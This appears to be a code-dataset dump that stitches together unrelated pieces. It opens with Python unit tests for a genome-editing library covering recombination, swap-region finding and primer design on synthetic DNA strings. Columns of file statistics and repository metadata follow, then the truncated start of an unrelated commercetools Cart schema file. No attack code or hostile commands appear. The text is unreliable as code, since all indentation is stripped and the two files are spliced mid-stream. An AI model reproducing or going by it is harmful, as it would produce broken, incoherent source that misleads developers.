g = self.build_genome(True, template)
r = find_swap_region(g, cassette, arm_len)
self.assertEquals(len(r), 1)
self.assertEquals(r[0].fragment_id, g.fragments.all()[0].id)
self.assertEquals(r[0].fragment_name, g.fragments.all()[0].name)
self.assertEquals(r[0].start, len(template) - 8 + 1)
self.assertEquals(r[0].end, len(front_bs + middle + back_bs) - 8)
self.assertEquals(r[0].sequence, ''.join([front_bs, middle, back_bs]))
self.assertEquals(r[0].cassette_reversed, True)
self.assertEquals(r[0].front_arm, str(Seq(back_bs[-arm_len:]).reverse_complement()))
self.assertEquals(r[0].back_arm, str(Seq(front_bs[0:arm_len]).reverse_complement()))
def test_finding_reverse_complement_region_when_back_arm_is_across_circular_boundary(self):
upstream = "gagattgtccgcgtttt"
front_bs = "catagcgcacaggacgcggag"
middle = "cggcacctgtgagccg"
back_bs = "taatgaccccgaagcagg"
downstream = "gttaaggcgcgaacat"
replaced = "aaaaaaaaaaaaaaaaaaa"
cassette = str(Seq(''.join([front_bs, replaced, back_bs])).reverse_complement())
arm_len = min(len(front_bs), len(back_bs))
template = ''.join([back_bs[8:], downstream, upstream, front_bs, middle, back_bs[0:8]])
g = self.build_genome(True, template)
r = find_swap_region(g, cassette, arm_len)
self.assertEquals(len(r), 1)
self.assertEquals(r[0].fragment_id, g.fragments.all()[0].id)
self.assertEquals(r[0].fragment_name, g.fragments.all()[0].name)
self.assertEquals(r[0].start, len(back_bs) - 8 + len(downstream + upstream) + 1)
self.assertEquals(r[0].end, len(back_bs) - 8)
self.assertEquals(r[0].sequence, ''.join([front_bs, middle, back_bs]))
self.assertEquals(r[0].cassette_reversed, True)
self.assertEquals(r[0].front_arm, str(Seq(back_bs[-arm_len:]).reverse_complement()))
self.assertEquals(r[0].back_arm, str(Seq(front_bs[0:arm_len]).reverse_complement()))
def test_recombines_correctly(self):
upstream = "gagattgtccgcgtttt"
front_bs = "catagcgcacaggacgcggag"
middle = "cggcacctgtgagccg"
back_bs = "taatgaccccgaagcagg"
downstream = "gttaaggcgcgaacat"
replaced = "a" * 100
template = ''.join([upstream, front_bs, middle, back_bs, downstream])
cassette = ''.join([front_bs, replaced, back_bs])
arm_len = min(len(front_bs), len(back_bs))
g = self.build_genome(False, template)
c = recombine(g, cassette, arm_len)
self.assertNotEqual(g.id, c.id)
self.assertEquals(c.fragments.all()[0].indexed_fragment().sequence,
''.join([upstream, cassette, downstream]))
def test_recombines_ignoring_extra_bases_upstream_and_downstream_of_cassette(self):
upstream = "gagattgtccgcgtttt"
front_bs = "catagcgcacaggacgcggagcgacgtagtctgcatctgatgcatgcactac"
middle = "cggcacctgtgagccg"
back_bs = "taatgaccccgaagcagggcatcgtactactgatgcatgcacactgacgta"
downstream = "gttaaggcgcgaacat"
replaced = "a" * 100
template = ''.join([upstream, front_bs, middle, back_bs, downstream])
cassette = ''.join(['c' * 6 + front_bs, replaced, back_bs + 'c' * 6])
arm_len = min(len(front_bs), len(back_bs)) / 2
g = self.build_genome(False, template)
c = recombine(g, cassette, arm_len)
self.assertNotEqual(g.id, c.id)
self.assertEquals(c.fragments.all()[0].indexed_fragment().sequence,
''.join([upstream, front_bs, replaced, back_bs, downstream]))
def test_creates_operation(self):
upstream = "gagattgtccgcgtttt"
front_bs = "catagcgcacaggacgcggag"
middle = "cggcacctgtgagccg"
back_bs = "taatgaccccgaagcagg"
downstream = "gttaaggcgcgaacat"
replaced = "aaaaaaaaaaaaaaaaaaa"
template = ''.join([upstream, front_bs, middle, back_bs, downstream])
cassette = ''.join([front_bs, replaced, back_bs])
arm_len = min(len(front_bs), len(back_bs))
g = self.build_genome(False, template)
self.assertEquals(Operation.objects.count(), 0)
c = recombine(g, cassette, arm_len)
self.assertEquals(Operation.objects.count(), 1)
self.assertEquals(c.operation_set.all()[0].type, Operation.RECOMBINATION[0])
self.assertEquals(c.operation_set.all()[0].params,
json.dumps(dict(cassette=cassette, homology_arm_length=arm_len)))
def test_annotates_cassette(self):
upstream = "gagattgtccgcgtttt"
front_bs = "catagcgcacaggacgcggag"
middle = "cggcacctgtgagccg"
back_bs = "taatgaccccgaagcagg"
downstream = "gttaaggcgcgaacat"
replaced = "aaaaaaaaaaaaaaaaaaa"
template = ''.join([upstream, front_bs, middle, back_bs, downstream])
cassette = ''.join([front_bs, replaced, back_bs])
arm_len = min(len(front_bs), len(back_bs))
g = self.build_genome(False, template)
a = g.fragments.all()[0].indexed_fragment().annotations()
self.assertEquals(len(a), 0)
c = recombine(g, cassette, arm_len)
a = c.fragments.all()[0].indexed_fragment().annotations()
self.assertEquals(len(a), 1)
self.assertEquals(a[0].base_first, len(upstream) + 1)
self.assertEquals(a[0].base_last, len(upstream + cassette))
self.assertEquals(a[0].feature_base_first, 1)
self.assertEquals(a[0].feature_base_last, len(cassette))
self.assertEquals(a[0].feature.strand, 1)
self.assertEquals(a[0].feature.operation.type, Operation.RECOMBINATION[0])
self.assertEquals(a[0].feature.operation.genome, c)
def test_annotates_reversed_cassette(self):
upstream = "gagattgtccgcgtttt"
front_bs = "catagcgcacaggacgcggag"
middle = "cggcacctgtgagccg"
back_bs = "taatgaccccgaagcagg"
downstream = "gttaaggcgcgaacat"
replaced = "aaaaaaaaaaaaaaaaaaa"
template = ''.join([upstream, front_bs, middle, back_bs, downstream])
cassette = str(Seq(''.join([front_bs, replaced, back_bs])).reverse_complement())
arm_len = min(len(front_bs), len(back_bs))
g = self.build_genome(False, template)
a = g.fragments.all()[0].indexed_fragment().annotations()
self.assertEquals(len(a), 0)
c = recombine(g, cassette, arm_len)
a = c.fragments.all()[0].indexed_fragment().annotations()
self.assertEquals(len(a), 1)
self.assertEquals(a[0].base_first, len(upstream) + 1)
self.assertEquals(a[0].base_last, len(upstream + cassette))
self.assertEquals(a[0].feature_base_first, 1)
self.assertEquals(a[0].feature_base_last, len(cassette))
# on reverse strand
self.assertEquals(a[0].feature.strand, -1)
self.assertEquals(a[0].feature.operation.type, Operation.RECOMBINATION[0])
self.assertEquals(a[0].feature.operation.genome, c)
def test_integrates_and_annotates_cassette_across_circular_boundary(self):
upstream = "gagattgtccgcgtttt"
front_bs = "catagcgcacaggacgcggag"
middle = "cggcacctgtgagccg"
back_bs = "taatgaccccgaagcagg"
downstream = "gttaaggcgcgaacat"
replaced = "aaaaaaaaaaaaaaaaaaa"
cassette = ''.join([front_bs, replaced, back_bs])
arm_len = min(len(front_bs), len(back_bs))
template = ''.join([middle[8:], back_bs, downstream, upstream, front_bs, middle[0:8]])
g = self.build_genome(True, template)
c = recombine(g, cassette, arm_len)
self.assertNotEqual(g.id, c.id)
self.assertEquals(c.fragments.all()[0].indexed_fragment().sequence,
''.join([downstream, upstream, cassette]))
a = c.fragments.all()[0].indexed_fragment().annotations()
self.assertEquals(len(a), 1)
self.assertEquals(a[0].base_first, len(downstream + upstream) + 1)
self.assertEquals(a[0].base_last, len(downstream + upstream + cassette))
self.assertEquals(a[0].feature_base_first, 1)
self.assertEquals(a[0].feature_base_last, len(cassette))
self.assertEquals(a[0].feature.strand, 1)
self.assertEquals(a[0].feature.operation.type, Operation.RECOMBINATION[0])
self.assertEquals(a[0].feature.operation.genome, c)
def test_recombine_when_front_arm_is_across_circular_boundary(self):
upstream = "gagattgtccgcgtttt"
front_bs = "catagcgcacaggacgcggag"
middle = "cggcacctgtgagccg"
back_bs = "taatgaccccgaagcagg"
downstream = "gttaaggcgcgaacat"
replaced = "aaaaaaaaaaaaaaaaaaa"
cassette = ''.join([front_bs, replaced, back_bs])
arm_len = min(len(front_bs), len(back_bs))
template = ''.join([front_bs[8:], middle, back_bs, downstream, upstream, front_bs[0:8]])
g = self.build_genome(True, template)
c = recombine(g, cassette, arm_len)
self.assertNotEqual(g.id, c.id)
self.assertEquals(c.fragments.all()[0].indexed_fragment().sequence,
''.join([downstream, upstream, cassette]))
def test_recombine_when_back_arm_is_across_circular_boundary(self):
upstream = "gagattgtccgcgtttt"
front_bs = "catagcgcacaggacgcggag"
middle = "cggcacctgtgagccg"
back_bs = "taatgaccccgaagcagg"
downstream = "gttaaggcgcgaacat"
replaced = "aaaaaaaaaaaaaaaaaaa"
cassette = ''.join([front_bs, replaced, back_bs])
arm_len = min(len(front_bs), len(back_bs))
template = ''.join([back_bs[8:], downstream, upstream, front_bs, middle, back_bs[0:8]])
g = self.build_genome(True, template)
c = recombine(g, cassette, arm_len)
self.assertNotEqual(g.id, c.id)
self.assertEquals(c.fragments.all()[0].indexed_fragment().sequence,
''.join([downstream, upstream, cassette]))
def test_recombines_with_reverse_complement_cassette_correctly(self):
upstream = "gagattgtccgcgtttt"
front_bs = "catagcgcacaggacgcggag"
middle = "cggcacctgtgagccg"
back_bs = "taatgaccccgaagcagg"
downstream = "gttaaggcgcgaacat"
replaced = "aaaaaaaaaaaaaaaaaaa"
template = ''.join([upstream, front_bs, middle, back_bs, downstream])
cassette = str(Seq(''.join([front_bs, replaced, back_bs])).reverse_complement())
arm_len = min(len(front_bs), len(back_bs))
g = self.build_genome(False, template)
c = recombine(g, cassette, arm_len)
self.assertNotEqual(g.id, c.id)
self.assertEquals(c.fragments.all()[0].indexed_fragment().sequence,
''.join([upstream, front_bs, replaced, back_bs, downstream]))
def test_find_swap_region_api(self):
upstream = "gagattgtccgcgtttt"
front_bs = "catagcgcacaggacgcggag"
middle = "cggcacctgtgagccg"
back_bs = "taatgaccccgaagcagg"
downstream = "gttaaggcgcgaacat"
replaced = "aaaaaaaaaaaaaaaaaaa"
template = ''.join([upstream, front_bs, middle, back_bs, downstream])
cassette = ''.join([front_bs, replaced, back_bs])
arm_len = min(len(front_bs), len(back_bs))
g = self.build_genome(False, template)
res = self.client.post('/edge/genomes/%s/recombination/' % g.id,
data=json.dumps(dict(cassette=cassette,
homology_arm_length=arm_len,
create=False)),
content_type='application/json')
self.assertEquals(res.status_code, 200)
r = json.loads(res.content)
self.assertEquals(len(r), 1)
self.assertEquals(r[0]['fragment_id'], g.fragments.all()[0].id)
self.assertEquals(r[0]['fragment_name'], g.fragments.all()[0].name)
self.assertEquals(r[0]['start'], len(upstream) + 1)
self.assertEquals(r[0]['end'], len(template) - len(downstream))
self.assertEquals(r[0]['sequence'], ''.join([front_bs, middle, back_bs]))
self.assertEquals(r[0]['cassette_reversed'], False)
self.assertEquals(r[0]['front_arm'], front_bs[0:arm_len])
self.assertEquals(r[0]['back_arm'], back_bs[-arm_len:])
def test_recombination_api(self):
upstream = "gagattgtccgcgtttt"
front_bs = "catagcgcacaggacgcggag"
middle = "cggcacctgtgagccg"
back_bs = "taatgaccccgaagcagg"
downstream = "gttaaggcgcgaacat"
replaced = "aaaaaaaaaaaaaaaaaaa"
template = ''.join([upstream, front_bs, middle, back_bs, downstream])
cassette = ''.join([front_bs, replaced, back_bs])
arm_len = min(len(front_bs), len(back_bs))
g = self.build_genome(False, template)
res = self.client.post('/edge/genomes/%s/recombination/' % g.id,
data=json.dumps(dict(cassette=cassette,
homology_arm_length=arm_len,
create=True,
genome_name='FooBar')),
content_type='application/json')
self.assertEquals(res.status_code, 201)
r = json.loads(res.content)
self.assertEquals(r['name'], 'FooBar')
c = Genome.objects.get(pk=r['id'])
self.assertEquals(c.fragments.all()[0].indexed_fragment().sequence,
''.join([upstream, cassette, downstream]))
def test_recombines_multiple_times_on_different_fragments(self):
upstream = "gagattgtccgcgtttt"
front_bs = "catagcgcacaggacgcggag"
middle = "cggcacctgtgagccg"
back_bs = "taatgaccccgaagcagg"
downstream = "gttaaggcgcgaacat"
replaced = "aaaaaaaaaaaaaaaaaaaaaa"
template = ''.join([upstream, front_bs, middle, back_bs, downstream])
cassette = ''.join([front_bs, replaced, back_bs])
f1 = 't' * 20 + template + 'c' * 20 + template + 'c' * 30
f2 = 't' * 40 + template + 'c' * 15 + template + 'c' * 20
arm_len = min(len(front_bs), len(back_bs))
g = self.build_genome(False, f1, f2)
self.assertEquals(g.fragments.count(), 2)
c = recombine(g, cassette, arm_len)
self.assertEquals(c.fragments.count(), 2)
sequences = [f.indexed_fragment().sequence for f in c.fragments.all()]
sequences = sorted(sequences, key=lambda s: len(s))
self.assertEquals(sequences[0],
't' * 20 + upstream + cassette + downstream +
'c' * 20 + upstream + cassette + downstream + 'c' * 30)
self.assertEquals(sequences[1],
't' * 40 + upstream + cassette + downstream +
'c' * 15 + upstream + cassette + downstream + 'c' * 20)
def test_recombines_multiple_times_on_circular_fragment(self):
upstream = "gagattgtccgcgtttt"
front_bs = "catagcgcacaggacgcggag"
middle = "cggcacctgtgagccg"
back_bs = "taatgaccccgaagcagg"
downstream = "gttaaggcgcgaacat"
replaced = "aaaaaaaaaaaaaaaaaaaaaa"
template = ''.join([upstream, front_bs, middle, back_bs, downstream])
cassette = ''.join([front_bs, replaced, back_bs])
f = (
middle[0:8]
+ back_bs
+ downstream
+ 't' * 20
+ template
+ 'c' * 20
+ upstream
+ front_bs
+ middle[8:]
)
arm_len = min(len(front_bs), len(back_bs))
g = self.build_genome(True, f)
c = recombine(g, cassette, arm_len)
self.assertEquals(c.fragments.all()[0].indexed_fragment().sequence,
downstream + 't' * 20 + upstream + cassette + downstream +
'c' * 20 + upstream + cassette)
def test_multiple_recombines_return_same_child(self):
upstream = "gagattgtccgcgtttt"
front_bs = "catagcgcacaggacgcggag"
middle = "cggcacctgtgagccg"
back_bs = "taatgaccccgaagcagg"
downstream = "gttaaggcgcgaacat"
replaced = "aaaaaaaaaaaaaaaaaaa"
template = ''.join([upstream, front_bs, middle, back_bs, downstream])
cassette = ''.join([front_bs, replaced, back_bs])
arm_len = min(len(front_bs), len(back_bs))
g = self.build_genome(False, template)
res = self.client.post('/edge/genomes/%s/recombination/' % g.id,
data=json.dumps(dict(cassette=cassette,
homology_arm_length=arm_len,
create=True,
genome_name='FooBar')),
content_type='application/json')
self.assertEquals(res.status_code, 201)
r = json.loads(res.content)
c1 = r['id']
res = self.client.post('/edge/genomes/%s/recombination/' % g.id,
data=json.dumps(dict(cassette=cassette,
homology_arm_length=arm_len,
create=True,
genome_name='FooBar')),
content_type='application/json')
# returns 200 not 201
self.assertEquals(res.status_code, 200)
r = json.loads(res.content)
c2 = r['id']
self.assertEquals(c1, c2)
def test_multiple_recombines_return_active_child(self):
upstream = "gagattgtccgcgtttt"
front_bs = "catagcgcacaggacgcggag"
middle = "cggcacctgtgagccg"
back_bs = "taatgaccccgaagcagg"
downstream = "gttaaggcgcgaacat"
replaced = "aaaaaaaaaaaaaaaaaaa"
template = ''.join([upstream, front_bs, middle, back_bs, downstream])
cassette = ''.join([front_bs, replaced, back_bs])
arm_len = min(len(front_bs), len(back_bs))
g = self.build_genome(False, template)
res = self.client.post('/edge/genomes/%s/recombination/' % g.id,
data=json.dumps(dict(cassette=cassette,
homology_arm_length=arm_len,
create=True,
genome_name='FooBar')),
content_type='application/json')
self.assertEquals(res.status_code, 201)
r = json.loads(res.content)
c = Genome.objects.get(pk=r['id'])
c.active = False
c.save()
res = self.client.post('/edge/genomes/%s/recombination/' % g.id,
data=json.dumps(dict(cassette=cassette,
homology_arm_length=arm_len,
create=True,
genome_name='FooBar')),
content_type='application/json')
self.assertEquals(res.status_code, 200)
r = json.loads(res.content)
c = Genome.objects.get(pk=r['id'])
self.assertEquals(c.active, True)
def __test_verification_primers(self, template, middle, cassette, arm_len, is_reversed):
from edge.pcr import pcr_from_genome
g = self.build_genome(False, template)
r = find_swap_region(g, cassette, arm_len, design_primers=True)
self.assertEquals(len(r), 1)
self.assertEquals(len(r[0].verification_cassette), 5)
self.assertEquals(len(r[0].verification_front), 5)
self.assertEquals(len(r[0].verification_back), 5)
# cassette verification primers should work on unmodified genome
for primer in r[0].verification_cassette:
p = pcr_from_genome(g, primer['PRIMER_LEFT_SEQUENCE'], primer['PRIMER_RIGHT_SEQUENCE'])
self.assertNotEqual(p[0], None)
self.assertEquals(p[0].index(middle) >= 0, True)
# front verification primers should NOT produce product
for primer in r[0].verification_front:
p = pcr_from_genome(g, primer['PRIMER_LEFT_SEQUENCE'], primer['PRIMER_RIGHT_SEQUENCE'])
self.assertEqual(p[0], None)
# back verification primers should NOT produce product
for primer in r[0].verification_back:
p = pcr_from_genome(g, primer['PRIMER_LEFT_SEQUENCE'], primer['PRIMER_RIGHT_SEQUENCE'])
self.assertEqual(p[0], None)
# do recombination, then try primers again on modified genome
c = recombine(g, cassette, arm_len)
for f in c.fragments.all():
try:
os.unlink(fragment_fasta_fn(f))
except:
pass
build_all_genome_dbs(refresh=True)
# reload to get blastdb
c = Genome.objects.get(pk=c.id)
if is_reversed:
cassette = str(Seq(cassette).reverse_complement())
# cassette verification primers should work on modified genome, finding cassette
for primer in r[0].verification_cassette:
p = pcr_from_genome(c, primer['PRIMER_LEFT_SEQUENCE'], primer['PRIMER_RIGHT_SEQUENCE'])
self.assertNotEqual(p[0], None)
self.assertEquals(p[0].index(cassette) >= 0, True)
# front verification primers should find a product including front of cassette
for primer in r[0].verification_front:
p = pcr_from_genome(c, primer['PRIMER_LEFT_SEQUENCE'], primer['PRIMER_RIGHT_SEQUENCE'])
self.assertNotEqual(p[0], None)
self.assertEquals(p[0].index(cassette[0:edge.recombine.CHECK_JUNCTION_LEFT_DN]) >= 0,
True)
# back verification primers should find a product including back of cassette
for primer in r[0].verification_back:
p = pcr_from_genome(c, primer['PRIMER_LEFT_SEQUENCE'], primer['PRIMER_RIGHT_SEQUENCE'])
self.assertNotEqual(p[0], None)
self.assertEquals(p[0].index(cassette[-edge.recombine.CHECK_JUNCTION_RIGHT_UP:]) >= 0,
True)
def test_finds_verification_primers_for_swap_region(self):
upstream = "gagattgtccgcgttttagctgatacgtacgtgtcgatcgacttgcgtatctgatcatctgacgtagat"
front_bs = "catagcgcacaggacgcggag"
middle = "ccagtcgctgaggcagtcgatgcaggcatcgatcaggctggcacctgtgagccgagctcacgtatgcatcatcattga"
back_bs = "taatgaccccgaagcagg"
downstream = "gttaaggcgcgaacatagctagtactagtcacgtagtcatttgtcgtacgtacgtattgagtcatca"
replaced = "gactacgatcagtcgtagtaacgcgtagcgtagtcagcgtacacgtacgtagacgacgtacatgcatcgtactgtatc"
template = ''.join([upstream, front_bs, middle, back_bs, downstream])
cassette = ''.join([front_bs, replaced, back_bs])
arm_len = min(len(front_bs), len(back_bs))
self.__test_verification_primers(template, middle, cassette, arm_len, False)
def test_finds_verification_primers_with_reverse_complement_cassette(self):
upstream = "gagattgtccgcgttttagctgatacgtacgtgtcgatcgacttgcgtatctgatcatctgacgtagat"
front_bs = "catagcgcacaggacgcggag"
middle = "ccagtcgctgaggcagtcgatgcaggcatcgatcaggctggcacctgtgagccgagctcacgtatgcatcatcattga"
back_bs = "taatgaccccgaagcagg"
downstream = "gttaaggcgcgaacatagctagtactagtcacgtagtcatttgtcgtacgtacgtattgagtcatca"
replaced = "gactacgatcagtcgtagtaacgcgtagcgtagtcagcgtacacgtacgtagacgacgtacatgcatcgtactgtatc"
template = ''.join([upstream, front_bs, middle, back_bs, downstream])
cassette = str(Seq(''.join([front_bs, replaced, back_bs])).reverse_complement())
arm_len = min(len(front_bs), len(back_bs))
self.__test_verification_primers(template, middle, cassette, arm_len, True)
def test_does_not_return_front_back_junction_verification_primers_if_they_are_not_useful(self):
upstream = "gagattgtccgcgttttagctgatacgtacgtgtcgatcgacttgcgtatctgatcatctgacgtagat"
front_bs = "catagcgcacaggacgcggag"
middle = "ccagtcgctgaggcagtcgatgcaggcatcgatcaggctggcacctgtgagccgagctcacgtatgcatcatcattga"
back_bs = "taatgaccccgaagcagg"
downstream = "gttaaggcgcgaacatagctagtactagtcacgtagtcatttgtcgtacgtacgtattgagtcatca"
replaced = "gactacgatcagtcgtagtaacgcgtagcgtagtcagcgtacacgtacgtagacgacgtacatgcatcgtactgtatc"
template = ''.join([upstream, front_bs, middle, back_bs, downstream])
cassette = ''.join([front_bs, replaced, back_bs])
arm_len = min(len(front_bs), len(back_bs))
g = self.build_genome(False, template)
r = find_swap_region(g, cassette, arm_len, design_primers=True)
self.assertEquals(len(r), 1)
self.assertEquals(len(r[0].verification_cassette), 5)
self.assertEquals(len(r[0].verification_front), 5)
self.assertEquals(len(r[0].verification_back), 5)
# cassette same as region to be replaced, front and back verification
# primers are not useful
cassette = ''.join([front_bs, middle, back_bs])
r = find_swap_region(g, cassette, arm_len, design_primers=True)
self.assertEquals(len(r), 1)
self.assertEquals(len(r[0].verification_cassette), 5)
self.assertEquals(len(r[0].verification_front), 0)
self.assertEquals(len(r[0].verification_back), 0)
class SingleCrossoverTest(TestCase):
def setUp(self):
self.old_check_junction_lu = edge.recombine.CHECK_JUNCTION_LEFT_UP
self.old_check_junction_ld = edge.recombine.CHECK_JUNCTION_LEFT_DN
self.old_check_junction_ru = edge.recombine.CHECK_JUNCTION_RIGHT_UP
self.old_check_junction_rd = edge.recombine.CHECK_JUNCTION_RIGHT_DN
edge.recombine.CHECK_JUNCTION_LEFT_UP = 10
edge.recombine.CHECK_JUNCTION_LEFT_DN = 40
edge.recombine.CHECK_JUNCTION_RIGHT_UP = 40
edge.recombine.CHECK_JUNCTION_RIGHT_DN = 10
self.old_single_cross_over_gap_max = edge.recombine.SINGLE_CROSSOVER_MAX_GAP
self.new_max_gap = 20
edge.recombine.SINGLE_CROSSOVER_MAX_GAP = self.new_max_gap
def tearDown(self):
edge.recombine.CHECK_JUNCTION_LEFT_UP = self.old_check_junction_lu
edge.recombine.CHECK_JUNCTION_LEFT_DN = self.old_check_junction_ld
edge.recombine.CHECK_JUNCTION_RIGHT_UP = self.old_check_junction_ru
edge.recombine.CHECK_JUNCTION_RIGHT_DN = self.old_check_junction_rd
edge.recombine.SINGLE_CROSSOVER_MAX_GAP = self.old_single_cross_over_gap_max
def build_genome(self, circular, *templates):
g = Genome(name='Foo')
g.save()
for seq in templates:
f = Fragment.create_with_sequence('Bar', seq, circular=circular)
Genome_Fragment(genome=g, fragment=f, inherited=False).save()
try:
os.unlink(fragment_fasta_fn(f))
except:
pass
build_all_genome_dbs(refresh=True)
return Genome.objects.get(pk=g.id)
def test_single_crossover_integrates_correctly(self):
upstream = "gagattgtccgcgtttt"
locus = "catagcgcacaggacgcggagtaggcgtagtcggttgatctgatgtc"
downstream = "gttaaggcgcgaacat"
insertion = "aaaaaaaaaaaaaaaaaaa"
locus_len = len(locus)
bs_len = int(locus_len / 2)
template = ''.join([upstream, locus, downstream])
cassette = ''.join([locus[locus_len - bs_len:], insertion, locus[0:bs_len]])
g = self.build_genome(False, template)
c = recombine(g, cassette, bs_len - 2)
self.assertNotEqual(g.id, c.id)
self.assertEquals(c.fragments.all()[0].indexed_fragment().sequence,
''.join([upstream, locus, insertion, locus, downstream]))
def test_single_crossover_integrates_correctly_with_gap_in_homology(self):
upstream = "gagattgtccgcgtttt"
locus = "catagcgcacaggacgcggagtaggcgtagtcggttgatctgatgtc"
downstream = "gttaaggcgcgaacat"
insertion = "aaaaaaaaaaaaaaaaaaa"
locus_len = len(locus)
gap = self.new_max_gap / 2
arm_short = 2
bs_len = int(locus_len / 2) - (gap - arm_short)
template = ''.join([upstream, locus, downstream])
cassette = ''.join([locus[locus_len - bs_len:], insertion, locus[0:bs_len]])
g = self.build_genome(False, template)
c = recombine(g, cassette, bs_len - arm_short)
self.assertNotEqual(g.id, c.id)
self.assertEquals(c.fragments.all()[0].indexed_fragment().sequence,
''.join([upstream, locus, insertion, locus, downstream]))
def test_single_crossover_integrates_correctly_with_reverse_complement_of_locus(self):
upstream = "gagattgtccgcgtttt"
locus = "catagcgcacaggacgcggagtaggcgtagtcggttgatctgatgtc"
downstream = "gttaaggcgcgaacat"
insertion = "aaaaaaaaaaaaaaaaaaa"
locus_len = len(locus)
bs_len = int(locus_len / 2)
template = ''.join([upstream, locus, downstream])
cassette = ''.join([locus[locus_len - bs_len:], insertion, locus[0:bs_len]])
cassette = str(Seq(cassette).reverse_complement())
g = self.build_genome(False, template)
c = recombine(g, cassette, bs_len - 2)
self.assertNotEqual(g.id, c.id)
self.assertEquals(c.fragments.all()[0].indexed_fragment().sequence,
''.join([upstream, locus, insertion, locus, downstream]))
def test_single_crossover_integrates_correctly_with_reverse_complement_and_gap_in_locus(self):
upstream = "gagattgtccgcgtttt"
locus = "catagcgcacaggacgcggagtaggcgtagtcggttgatctgatgtc"
downstream = "gttaaggcgcgaacat"
insertion = "aaaaaaaaaaaaaaaaaaa"
locus_len = len(locus)
gap = self.new_max_gap / 2
arm_short = 2
bs_len = int(locus_len / 2) - (gap - arm_short)
template = ''.join([upstream, locus, downstream])
cassette = ''.join([locus[locus_len - bs_len:], insertion, locus[0:bs_len]])
cassette = str(Seq(cassette).reverse_complement())
g = self.build_genome(False, template)
c = recombine(g, cassette, bs_len - arm_short)
self.assertNotEqual(g.id, c.id)
self.assertEquals(c.fragments.all()[0].indexed_fragment().sequence,
''.join([upstream, locus, insertion, locus, downstream]))
| 45.992196
| 99
| 0.641498
| 4,696
| 41,255
| 5.407155
| 0.050468
| 0.100819
| 0.048874
| 0.05104
| 0.932932
| 0.917021
| 0.89414
| 0.88138
| 0.876772
| 0.865942
| 0
| 0.011868
| 0.240189
| 41,255
| 896
| 100
| 46.043527
| 0.798188
| 0.01481
| 0
| 0.824586
| 0
| 0
| 0.11474
| 0.050405
| 0
| 0
| 0
| 0
| 0.243094
| 1
| 0.059392
| false
| 0.004144
| 0.012431
| 0
| 0.078729
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1a4ff4ec915f23e7c019a823ef18c805568717f8
| 93,000
|
py
|
Python
|
src/commercetools/platform/models/_schemas/cart.py
|
lime-green/commercetools-python-sdk
|
63b77f6e5abe43e2b3ebbf3cdbbe00c7cf80dca6
|
[
"MIT"
] | 1
|
2021-04-07T20:01:30.000Z
|
2021-04-07T20:01:30.000Z
|
src/commercetools/platform/models/_schemas/cart.py
|
lime-green/commercetools-python-sdk
|
63b77f6e5abe43e2b3ebbf3cdbbe00c7cf80dca6
|
[
"MIT"
] | null | null | null |
src/commercetools/platform/models/_schemas/cart.py
|
lime-green/commercetools-python-sdk
|
63b77f6e5abe43e2b3ebbf3cdbbe00c7cf80dca6
|
[
"MIT"
] | null | null | null |
# Generated file, please do not change!!!
import re
import typing
import marshmallow
import marshmallow_enum
from commercetools import helpers
from ... import models
from ..cart import (
CartOrigin,
CartState,
DiscountCodeState,
InventoryMode,
LineItemMode,
LineItemPriceMode,
RoundingMode,
ShippingMethodState,
TaxCalculationMode,
TaxMode,
)
from ..common import ReferenceTypeId
from .common import (
BaseResourceSchema,
LocalizedStringField,
ReferenceSchema,
ResourceIdentifierSchema,
)
from .type import FieldContainerField
# Fields
# Marshmallow Schemas
class CartSchema(BaseResourceSchema):
key = marshmallow.fields.String(allow_none=True, missing=None)
last_modified_by = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".common.LastModifiedBySchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
data_key="lastModifiedBy",
)
created_by = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".common.CreatedBySchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
data_key="createdBy",
)
customer_id = marshmallow.fields.String(
allow_none=True,
metadata={"omit_empty": True},
missing=None,
data_key="customerId",
)
customer_email = marshmallow.fields.String(
allow_none=True,
metadata={"omit_empty": True},
missing=None,
data_key="customerEmail",
)
anonymous_id = marshmallow.fields.String(
allow_none=True,
metadata={"omit_empty": True},
missing=None,
data_key="anonymousId",
)
store = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".store.StoreKeyReferenceSchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
)
line_items = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".LineItemSchema"),
allow_none=True,
many=True,
unknown=marshmallow.EXCLUDE,
missing=None,
data_key="lineItems",
)
custom_line_items = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".CustomLineItemSchema"),
allow_none=True,
many=True,
unknown=marshmallow.EXCLUDE,
missing=None,
data_key="customLineItems",
)
total_price = helpers.Discriminator(
allow_none=True,
discriminator_field=("type", "type"),
discriminator_schemas={
"centPrecision": helpers.absmod(
__name__, ".common.CentPrecisionMoneySchema"
),
"highPrecision": helpers.absmod(
__name__, ".common.HighPrecisionMoneySchema"
),
},
missing=None,
data_key="totalPrice",
)
taxed_price = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".TaxedPriceSchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
data_key="taxedPrice",
)
cart_state = marshmallow_enum.EnumField(
CartState, by_value=True, allow_none=True, missing=None, data_key="cartState"
)
shipping_address = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".common.AddressSchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
data_key="shippingAddress",
)
billing_address = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".common.AddressSchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
data_key="billingAddress",
)
inventory_mode = marshmallow_enum.EnumField(
InventoryMode,
by_value=True,
allow_none=True,
metadata={"omit_empty": True},
missing=None,
data_key="inventoryMode",
)
tax_mode = marshmallow_enum.EnumField(
TaxMode, by_value=True, allow_none=True, missing=None, data_key="taxMode"
)
tax_rounding_mode = marshmallow_enum.EnumField(
RoundingMode,
by_value=True,
allow_none=True,
